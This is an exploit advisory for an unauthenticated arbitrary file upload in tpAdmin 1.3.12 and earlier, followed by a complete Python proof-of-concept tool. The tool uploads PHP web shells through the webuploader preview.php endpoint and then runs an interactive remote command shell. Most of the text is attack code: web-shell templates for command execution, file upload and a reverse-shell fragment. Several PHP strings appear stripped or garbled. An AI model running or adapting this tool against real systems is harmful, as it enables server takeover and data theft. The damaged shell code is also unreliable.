=============================================================================================================================================
| # Title : tpAdmin ≤ 1.3.12 Remote Code Execution via Arbitrary File Upload |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/yuan1994/tpAdmin |
=============================================================================================================================================
[+] Summary : A critical Remote Code Execution (RCE) vulnerability exists in tpAdmin versions ≤ 1.3.12 due to improper validation of file uploads within the preview.php component under /admin/lib/webuploader/0.1.5/server/.
The application fails to properly validate file type, MIME type, and executable content when processing Base64-encoded data URIs.
An attacker can craft a malicious payload disguised as an image and upload arbitrary PHP code to the server.
If the uploaded file is stored within a web-accessible directory and PHP execution is permitted, this results in unauthenticated remote code execution
[+] POC :
#!/usr/bin/env python3
import requests
import base64
import sys
import argparse
from urllib.parse import urljoin
import time
class Colors:
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
END = '\033[0m'
def print_banner():
"""Prints the tool banner"""
banner = f"""
{Colors.BLUE}
╔══════════════════════════════════════════════════════════════╗
║ tpadmin RCE Exploit ║
║ Remote Code Execution via Arbitrary File Upload ║
║ Discovered by: indoushka ║
║ Exploit coded for educational purposes only ║
╚══════════════════════════════════════════════════════════════╝
{Colors.END}
"""
print(banner)
def encode_payload(php_code):
"""
Encodes PHP code to base64
Args:
php_code (str): The PHP code to be encoded
Returns:
str: The base64 encoded code
"""
return base64.b64encode(php_code.encode()).decode()
def upload_shell(target_url, php_code, output_file=None):
"""
Uploads a shell to the target server
Args:
target_url (str): The base target URL
php_code (str): The PHP code to upload
output_file (str): The resulting filename (optional)
Returns:
tuple: (Success status, shell link, message)
"""
vuln_path = "/admin/lib/webuploader/0.1.5/server/preview.php"
full_url = urljoin(target_url, vuln_path)
encoded_code = encode_payload(php_code)
payload = f"data:image/php;base64,{encoded_code}"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
try:
print(f"{Colors.YELLOW}[*] Sending payload to: {full_url}{Colors.END}")
response = requests.post(
full_url,
headers=headers,
data=payload,
timeout=10,
verify=False
)
if response.status_code == 200:
import re
url_pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
urls = re.findall(url_pattern, response.text)
shell_url = None
for url in urls:
if '.php' in url:
shell_url = url
break
if not shell_url:
filename_match = re.search(r'([a-f0-9]+\.php)', response.text)
if filename_match:
filename = filename_match.group(1)
shell_url = urljoin(target_url, f"/public/uploads/{filename}")
return True, shell_url, "File uploaded successfully"
else:
return False, None, f"Upload failed: {response.status_code}"
except requests.exceptions.Timeout:
return False, None, "Connection timed out"
except requests.exceptions.ConnectionError:
return False, None, "Failed to connect to the server"
except Exception as e:
return False, None, f"Error: {str(e)}"
def generate_php_shell(shell_type="simple"):
"""
Generates PHP shell code of various types
Args:
shell_type (str): Shell type (simple, system, reverse, full)
Returns:
str: PHP code
"""
shells = {
"simple": """""",
"system": """System Command Executor";
if(isset($_REQUEST['cmd'])) {
echo "";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "";
die;
} else {
echo "Usage: ?cmd=command";
}
?>""",
"reverse": """$sock, 1=>$sock, 2=>$sock), $pipes);
?>""",
"full": """tpadmin RCE Shell - CVE-2026-2113";
echo "
";
// System Information
echo "System Info:
";
echo "";
echo "OS: " . php_uname() . "\\n";
echo "User: " . get_current_user() . "\\n";
echo "PHP Version: " . phpversion() . "\\n";
echo "Server Software: " . $_SERVER['SERVER_SOFTWARE'] . "\\n";
echo "Document Root: " . $_SERVER['DOCUMENT_ROOT'] . "\\n";
echo "";
// Command Execution
if(isset($_REQUEST['cmd'])) {
echo "Command Execution:
";
echo "";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "";
}
// Simple UI
echo "
";
echo "";
// File Upload
if(isset($_FILES['file'])) {
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "File uploaded: " . $uploadfile . "\\n";
} else {
echo "File upload failed\\n";
}
}
echo "
";
echo "";
?>"""
}
return shells.get(shell_type, shells["simple"])
def check_vulnerability(target_url):
"""
Checks if the target is vulnerable
Args:
target_url (str): The target URL
Returns:
bool: Whether the target is vulnerable
"""
vuln_path = "/admin/lib/webuploader/0.1.5/server/preview.php"
full_url = urljoin(target_url, vuln_path)
try:
response = requests.get(full_url, timeout=5, verify=False)
if response.status_code == 200:
test_code = ""
encoded = encode_payload(test_code)
payload = f"data:image/php;base64,{encoded}"
test_response = requests.post(
full_url,
data=payload,
timeout=5,
verify=False
)
if test_response.status_code == 200:
return True
except:
pass
return False
def interactive_shell(shell_url):
"""
Runs an interactive shell
Args:
shell_url (str): The shell URL
"""
print(f"{Colors.GREEN}[+] Interactive shell started{Colors.END}")
print(f"{Colors.YELLOW}[*] Type 'exit' to quit{Colors.END}")
print(f"{Colors.YELLOW}[*] Type 'help' for assistance{Colors.END}")
while True:
try:
cmd = input(f"{Colors.BLUE}shell> {Colors.END}").strip()
if cmd.lower() == 'exit':
break
elif cmd.lower() == 'help':
print("Available commands:")
print(" exit - Exit the shell")
print(" help - Display this help")
print(" clear - Clear the screen")
print(" any command - Execute any system command")
continue
elif cmd.lower() == 'clear':
import os
os.system('cls' if os.name == 'nt' else 'clear')
continue
elif not cmd:
continue
# Send command to shell
params = {'cmd': cmd}
response = requests.get(shell_url, params=params, timeout=10, verify=False)
if response.status_code == 200:
print(response.text)
else:
print(f"{Colors.RED}[-] Error executing command{Colors.END}")
except KeyboardInterrupt:
print("\nExiting...")
break
except Exception as e:
print(f"{Colors.RED}[-] Error: {str(e)}{Colors.END}")
def main():
"""Main function"""
print_banner()
parser = argparse.ArgumentParser(
description="tpadmin RCE Exploit - CVE-2026-2113",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
"-u", "--url",
required=True,
help="Target URL (e.g., http://target.com)"
)
parser.add_argument(
"-t", "--type",
choices=["simple", "system", "reverse", "full"],
default="simple",
help="Shell type (default: simple)"
)
parser.add_argument(
"-c", "--command",
help="Single command to execute (instead of interactive shell)"
)
parser.add_argument(
"-o", "--output",
help="Save results to a file"
)
parser.add_argument(
"--check-only",
action="store_true",
help="Only check if the target is vulnerable"
)
parser.add_argument(
"--no-ssl-verify",
action="store_true",
help="Ignore SSL certificate verification"
)
args = parser.parse_args()
if args.no_ssl_verify:
requests.packages.urllib3.disable_warnings()
print(f"{Colors.YELLOW}[*] Checking target: {args.url}{Colors.END}")
if args.check_only:
if check_vulnerability(args.url):
print(f"{Colors.GREEN}[+] Target is vulnerable!{Colors.END}")
sys.exit(0)
else:
print(f"{Colors.RED}[-] Target is not vulnerable or unreachable{Colors.END}")
sys.exit(1)
php_code = generate_php_shell(args.type)
if args.command and args.type == "system":
php_code = f""
success, shell_url, message = upload_shell(args.url, php_code, args.output)
if success:
print(f"{Colors.GREEN}[+] {message}{Colors.END}")
if shell_url:
print(f"{Colors.GREEN}[+] Shell URL: {shell_url}{Colors.END}")
if args.output:
with open(args.output, 'w') as f:
f.write(f"Target: {args.url}\n")
f.write(f"Shell URL: {shell_url}\n")
f.write(f"PHP Code:\n{php_code}\n")
print(f"{Colors.GREEN}[+] Results saved to: {args.output}{Colors.END}")
if args.command:
response = requests.get(shell_url, params={'cmd': args.command}, verify=False)
if response.status_code == 200:
print(f"{Colors.GREEN}[+] Command result:{Colors.END}")
print(response.text)
else:
print(f"{Colors.RED}[-] Command execution failed{Colors.END}")
else:
try:
interactive_shell(shell_url)
except KeyboardInterrupt:
print("\nExiting...")
else:
print(f"{Colors.YELLOW}[*] Shell link not found; manual search might be required{Colors.END}")
print(f"{Colors.YELLOW}[*] Try looking in: {args.url}/public/uploads/{Colors.END}")
else:
print(f"{Colors.RED}[-] {message}{Colors.END}")
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================